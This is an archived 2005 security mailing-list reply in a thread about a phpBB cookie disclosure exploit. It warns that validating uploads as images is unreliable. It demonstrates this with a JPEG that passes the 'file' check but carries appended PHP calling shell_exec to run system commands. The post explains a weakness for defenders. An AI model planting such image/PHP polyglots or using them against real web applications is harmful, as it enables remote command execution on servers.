lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <1130419392.9108.54.camel@localhost>
Date: Thu, 27 Oct 2005 15:23:12 +0200
From: Nicob <nicob@...ob.net>
To: Paul Laudanski <zx@...tlecops.com>
Cc: webappsec@...urityfocus.com, bugtraq@...urityfocus.com,
	full-disclosure@...ts.grok.org.uk
Subject: Re: phpBB 2.0.17 (and other BB systems as well)
	Cookie disclosure exploit.


Le mardi 25 octobre 2005 à 17:02 -0400, Paul Laudanski a écrit :
> 
> Anyone have other ideas on this?  I've already implemented some code
> to validate file input and its working.  But is this the right
> approach?

I'm not sure to understand what you're talking about but if you're
trying to positively validate that file XYZ is an image and not a PHP
file, you're asking for trouble :

$> wget http://nicob.net/mirrors/blowjob.jpg

$> file blowjob.jpg 
blowjob.jpg: JPEG image data, JFIF standard 1.0

$> tail -n 5 blowjob.jpg
<?php
$resu = shell_exec("echo '' && echo '' && uname -a && id && date");
echo nl2br($resu);
?>

$> php blowjob.jpg
[garbage] Linux dellyre 2.6.[...] jeu oct 27 15:21:31 CEST 2005 [...]


Nicob

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ